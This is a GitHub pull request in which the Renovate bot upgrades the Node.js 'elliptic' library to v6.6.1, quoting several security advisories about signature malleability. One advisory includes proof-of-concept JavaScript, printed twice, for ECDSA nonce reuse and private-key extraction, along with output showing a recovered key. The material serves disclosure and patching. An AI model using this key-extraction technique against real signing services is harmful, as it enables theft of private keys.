Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update dependency elliptic to v6.6.1 [SECURITY] #153

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Update dependency elliptic to v6.6.1 [SECURITY] #153

wants to merge 1 commit into from
+9 −4

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Aug 14, 2024
edited
Loading

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
elliptic 6.5.5 -> 6.6.1 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2024-42459

In the Elliptic package 6.5.6 for Node.js, EDDSA signature malleability occurs because there is a missing signature length check, and thus zero-valued bytes can be removed or appended.

CVE-2024-42461

In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because BER-encoded signatures are allowed.

CVE-2024-42460

In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because there is a missing check for whether the leading bit of r and s is zero.

CVE-2024-48949

The Elliptic package 6.5.5 for Node.js for EDDSA implementation does not perform the required check if the signature proof(s) is within the bounds of the order n of the base point of the elliptic curve, leading to signature malleability. Namely, the verify function in lib/elliptic/eddsa/index.js omits sig.S().gte(sig.eddsa.curve.n) || sig.S().isNeg() validation.

This vulnerability could have a security-relevant impact if an application relies on the uniqueness of a signature.

CVE-2024-48948

The Elliptic prior to 6.6.0 for Node.js, in its for ECDSA implementation, does not correctly verify valid signatures if the hash contains at least four leading 0 bytes and when the order of the elliptic curve's base point is smaller than the hash, because of an _truncateToN anomaly. This leads to valid signatures being rejected. Legitimate transactions or communications may be incorrectly flagged as invalid.

GHSA-vjh7-7g9h-fjfh

Summary

Private key can be extracted from ECDSA signature upon signing a malformed input (e.g. a string or a number), which could e.g. come from JSON network input

Note that elliptic by design accepts hex strings as one of the possible input types

Details

In this code: https://github.com/indutny/elliptic/blob/3e46a48fdd2ef2f89593e5e058d85530578c9761/lib/elliptic/ec/index.js#L100-L107

msg is a BN instance after conversion, but nonce is an array, and different BN instances could generate equivalent arrays after conversion.

Meaning that a same nonce could be generated for different messages used in signing process, leading to k reuse, leading to private key extraction from a pair of signatures

Such a message can be constructed for any already known message/signature pair, meaning that the attack needs only a single malicious message being signed for a full key extraction

While signing unverified attacker-controlled messages would be problematic itself (and exploitation of this needs such a scenario), signing a single message still should not leak the private key

Also, message validation could have the same bug (out of scope for this report, but could be possible in some situations), which makes this attack more likely when used in a chain

PoC

k reuse example

import elliptic from 'elliptic'

const { ec: EC } = elliptic

const privateKey = crypto.getRandomValues(new Uint8Array(32))
const curve = 'ed25519' // or any other curve, e.g. secp256k1
const ec = new EC(curve)
const prettyprint = ({ r, s }) => `r: ${r}, s: ${s}`
const sig0 = prettyprint(ec.sign(Buffer.alloc(32, 1), privateKey)) // array of ones
const sig1 = prettyprint(ec.sign('01'.repeat(32), privateKey)) // same message in hex form
const sig2 = prettyprint(ec.sign('-' + '01'.repeat(32), privateKey)) // same `r`, different `s`
console.log({ sig0, sig1, sig2 })

Full attack

This doesn't include code for generation/recovery on a purpose (bit it's rather trivial)

import elliptic from 'elliptic'

const { ec: EC } = elliptic

const privateKey = crypto.getRandomValues(new Uint8Array(32))
const curve = 'secp256k1' // or any other curve, e.g. ed25519
const ec = new EC(curve)

// Any message, e.g. previously known signature
const msg0 = crypto.getRandomValues(new Uint8Array(32))
const sig0 = ec.sign(msg0, privateKey)

// Attack
const msg1 = funny(msg0) // this is a string here, but can also be of other non-Uint8Array types
const sig1 = ec.sign(msg1, privateKey)

const something = extract(msg0, sig0, sig1, curve)

console.log('Curve:', curve)
console.log('Typeof:', typeof msg1)
console.log('Keys equal?', Buffer.from(privateKey).toString('hex') === something)
const rnd = crypto.getRandomValues(new Uint8Array(32))
const st = (x) => JSON.stringify(x)
console.log('Keys equivalent?', st(ec.sign(rnd, something).toDER()) === st(ec.sign(rnd, privateKey).toDER()))
console.log('Orig key:', Buffer.from(privateKey).toString('hex'))
console.log('Restored:', something)

Output:

Curve: secp256k1
Typeof: string
Keys equal? true
Keys equivalent? true
Orig key: c7870f7eb3e8fd5155d5c8cdfca61aa993eed1fbe5b41feef69a68303248c22a
Restored: c7870f7eb3e8fd5155d5c8cdfca61aa993eed1fbe5b41feef69a68303248c22a

Similar for ed25519, but due to low n, the key might not match precisely but is nevertheless equivalent for signing:

Curve: ed25519
Typeof: string
Keys equal? false
Keys equivalent? true
Orig key: f1ce0e4395592f4de24f6423099e022925ad5d2d7039b614aaffdbb194a0d189
Restored: 01ce0e4395592f4de24f6423099e0227ec9cb921e3b7858581ec0d26223966a6

restored is equal to orig mod N.

Impact

Full private key extraction when signing a single malicious message (that passes JSON.stringify/JSON.parse)

Elliptic's verify function omits uniqueness validation

CVE-2024-48949 / GHSA-434g-2637-qmqr

More information

Details

The Elliptic package 6.5.5 for Node.js for EDDSA implementation does not perform the required check if the signature proof(s) is within the bounds of the order n of the base point of the elliptic curve, leading to signature malleability. Namely, the verify function in lib/elliptic/eddsa/index.js omits sig.S().gte(sig.eddsa.curve.n) || sig.S().isNeg() validation.

This vulnerability could have a security-relevant impact if an application relies on the uniqueness of a signature.

Severity

  • CVSS Score: 5.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Elliptic's EDDSA missing signature length check

CVE-2024-42459 / GHSA-f7q4-pwc6-w24p

More information

Details

In the Elliptic package 6.5.6 for Node.js, EDDSA signature malleability occurs because there is a missing signature length check, and thus zero-valued bytes can be removed or appended.

Severity

  • CVSS Score: 5.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Elliptic's ECDSA missing check for whether leading bit of r and s is zero

CVE-2024-42460 / GHSA-977x-g7h5-7qgw

More information

Details

In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because there is a missing check for whether the leading bit of r and s is zero.

Severity

  • CVSS Score: 5.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Elliptic allows BER-encoded signatures

CVE-2024-42461 / GHSA-49q7-c7j4-3p7m

More information

Details

In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because BER-encoded signatures are allowed.

Severity

  • CVSS Score: 5.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Valid ECDSA signatures erroneously rejected in Elliptic

CVE-2024-48948 / GHSA-fc9h-whq2-v747

More information

Details

The Elliptic prior to 6.6.0 for Node.js, in its for ECDSA implementation, does not correctly verify valid signatures if the hash contains at least four leading 0 bytes and when the order of the elliptic curve's base point is smaller than the hash, because of an _truncateToN anomaly. This leads to valid signatures being rejected. Legitimate transactions or communications may be incorrectly flagged as invalid.

Severity

  • CVSS Score: 4.8 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Elliptic's private key extraction in ECDSA upon signing a malformed input (e.g. a string)

GHSA-vjh7-7g9h-fjfh

More information

Details

Summary

Private key can be extracted from ECDSA signature upon signing a malformed input (e.g. a string or a number), which could e.g. come from JSON network input

Note that elliptic by design accepts hex strings as one of the possible input types

Details

In this code: https://github.com/indutny/elliptic/blob/3e46a48fdd2ef2f89593e5e058d85530578c9761/lib/elliptic/ec/index.js#L100-L107

msg is a BN instance after conversion, but nonce is an array, and different BN instances could generate equivalent arrays after conversion.

Meaning that a same nonce could be generated for different messages used in signing process, leading to k reuse, leading to private key extraction from a pair of signatures

Such a message can be constructed for any already known message/signature pair, meaning that the attack needs only a single malicious message being signed for a full key extraction

While signing unverified attacker-controlled messages would be problematic itself (and exploitation of this needs such a scenario), signing a single message still should not leak the private key

Also, message validation could have the same bug (out of scope for this report, but could be possible in some situations), which makes this attack more likely when used in a chain

PoC
k reuse example
import elliptic from 'elliptic'

const { ec: EC } = elliptic

const privateKey = crypto.getRandomValues(new Uint8Array(32))
const curve = 'ed25519' // or any other curve, e.g. secp256k1
const ec = new EC(curve)
const prettyprint = ({ r, s }) => `r: ${r}, s: ${s}`
const sig0 = prettyprint(ec.sign(Buffer.alloc(32, 1), privateKey)) // array of ones
const sig1 = prettyprint(ec.sign('01'.repeat(32), privateKey)) // same message in hex form
const sig2 = prettyprint(ec.sign('-' + '01'.repeat(32), privateKey)) // same `r`, different `s`
console.log({ sig0, sig1, sig2 })
Full attack

This doesn't include code for generation/recovery on a purpose (bit it's rather trivial)

import elliptic from 'elliptic'

const { ec: EC } = elliptic

const privateKey = crypto.getRandomValues(new Uint8Array(32))
const curve = 'secp256k1' // or any other curve, e.g. ed25519
const ec = new EC(curve)

// Any message, e.g. previously known signature
const msg0 = crypto.getRandomValues(new Uint8Array(32))
const sig0 = ec.sign(msg0, privateKey)

// Attack
const msg1 = funny(msg0) // this is a string here, but can also be of other non-Uint8Array types
const sig1 = ec.sign(msg1, privateKey)

const something = extract(msg0, sig0, sig1, curve)

console.log('Curve:', curve)
console.log('Typeof:', typeof msg1)
console.log('Keys equal?', Buffer.from(privateKey).toString('hex') === something)
const rnd = crypto.getRandomValues(new Uint8Array(32))
const st = (x) => JSON.stringify(x)
console.log('Keys equivalent?', st(ec.sign(rnd, something).toDER()) === st(ec.sign(rnd, privateKey).toDER()))
console.log('Orig key:', Buffer.from(privateKey).toString('hex'))
console.log('Restored:', something)

Output:

Curve: secp256k1
Typeof: string
Keys equal? true
Keys equivalent? true
Orig key: c7870f7eb3e8fd5155d5c8cdfca61aa993eed1fbe5b41feef69a68303248c22a
Restored: c7870f7eb3e8fd5155d5c8cdfca61aa993eed1fbe5b41feef69a68303248c22a

Similar for ed25519, but due to low n, the key might not match precisely but is nevertheless equivalent for signing:

Curve: ed25519
Typeof: string
Keys equal? false
Keys equivalent? true
Orig key: f1ce0e4395592f4de24f6423099e022925ad5d2d7039b614aaffdbb194a0d189
Restored: 01ce0e4395592f4de24f6423099e0227ec9cb921e3b7858581ec0d26223966a6

restored is equal to orig mod N.

Impact

Full private key extraction when signing a single malicious message (that passes JSON.stringify/JSON.parse)

Severity

  • CVSS Score: Unknown
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Release Notes

indutny/elliptic (elliptic)

v6.6.1

Compare Source

v6.6.0

Compare Source

v6.5.7

Compare Source

v6.5.6

Compare Source

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot changed the title Update dependency elliptic to v6.5.7 [SECURITY] Update dependency elliptic to v6.5.7 [SECURITY] - autoclosed Oct 19, 2024
@renovate renovate bot closed this Oct 19, 2024
@renovate renovate bot deleted the renovate/npm-elliptic-vulnerability branch October 19, 2024 07:43
@renovate renovate bot changed the title Update dependency elliptic to v6.5.7 [SECURITY] - autoclosed Update dependency elliptic to v6.5.7 [SECURITY] Oct 19, 2024
@renovate renovate bot reopened this Oct 19, 2024
@renovate renovate bot restored the renovate/npm-elliptic-vulnerability branch October 19, 2024 19:18
@renovate renovate bot force-pushed the renovate/npm-elliptic-vulnerability branch from 80dc0c3 to ce784aa Compare October 19, 2024 19:18
@socket-security Socket Security
Copy link

socket-security bot commented Oct 19, 2024
edited
Loading

New and updated dependencies detected. Learn more about Socket for GitHub ↗︎

Package New capabilities Transitives Size Publisher
npm/[email protected] None 0 99.9 kB fanatid
npm/[email protected]6.6.1 None 0 120 kB indutny

View full report↗︎

Have feedback? Participate in our User Experience Survey 📊

@renovate renovate bot changed the title Update dependency elliptic to v6.5.7 [SECURITY] Update dependency elliptic to v6.5.7 [SECURITY] - autoclosed Oct 20, 2024
@renovate renovate bot closed this Oct 20, 2024
@renovate renovate bot deleted the renovate/npm-elliptic-vulnerability branch October 20, 2024 19:04
@renovate renovate bot changed the title Update dependency elliptic to v6.5.7 [SECURITY] - autoclosed Update dependency elliptic to v6.5.7 [SECURITY] Oct 23, 2024
@renovate renovate bot restored the renovate/npm-elliptic-vulnerability branch October 23, 2024 08:59
@renovate renovate bot reopened this Oct 23, 2024
@renovate renovate bot force-pushed the renovate/npm-elliptic-vulnerability branch from ce784aa to d8e526b Compare October 23, 2024 08:59
@renovate renovate bot changed the title Update dependency elliptic to v6.5.7 [SECURITY] Update dependency elliptic to v6.5.7 [SECURITY] - autoclosed Oct 25, 2024
@renovate renovate bot closed this Oct 25, 2024
@renovate renovate bot deleted the renovate/npm-elliptic-vulnerability branch October 25, 2024 07:43
@renovate renovate bot changed the title Update dependency elliptic to v6.5.7 [SECURITY] - autoclosed Update dependency elliptic to v6.5.7 [SECURITY] Oct 25, 2024
@renovate renovate bot reopened this Oct 25, 2024
@renovate renovate bot restored the renovate/npm-elliptic-vulnerability branch October 25, 2024 18:07
@renovate renovate bot force-pushed the renovate/npm-elliptic-vulnerability branch 2 times, most recently from 0f34bd5 to 0d3cf25 Compare October 27, 2024 18:03
@renovate renovate bot changed the title Update dependency elliptic to v6.5.7 [SECURITY] Update dependency elliptic to v6.6.0 [SECURITY] Oct 27, 2024
@renovate renovate bot changed the title Update dependency elliptic to v6.6.0 [SECURITY] Update dependency elliptic to v6.5.7 [SECURITY] Oct 28, 2024
@renovate renovate bot changed the title Update dependency elliptic to v6.5.7 [SECURITY] Update dependency elliptic to v6.6.0 [SECURITY] Oct 29, 2024
@renovate renovate bot force-pushed the renovate/npm-elliptic-vulnerability branch 2 times, most recently from de4e15d to 541f487 Compare January 30, 2025 16:35
@renovate renovate bot force-pushed the renovate/npm-elliptic-vulnerability branch from 541f487 to b2b9108 Compare February 13, 2025 17:29
@renovate renovate bot changed the title Update dependency elliptic to v6.6.0 [SECURITY] Update dependency elliptic to v6.6.1 [SECURITY] Feb 13, 2025
@renovate
Update dependency elliptic to v6.6.1 [SECURITY]
aa70941 
Signed-off-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
@renovate renovate bot force-pushed the renovate/npm-elliptic-vulnerability branch from b2b9108 to aa70941 Compare March 3, 2025 13:32
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
type:security
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
0 participants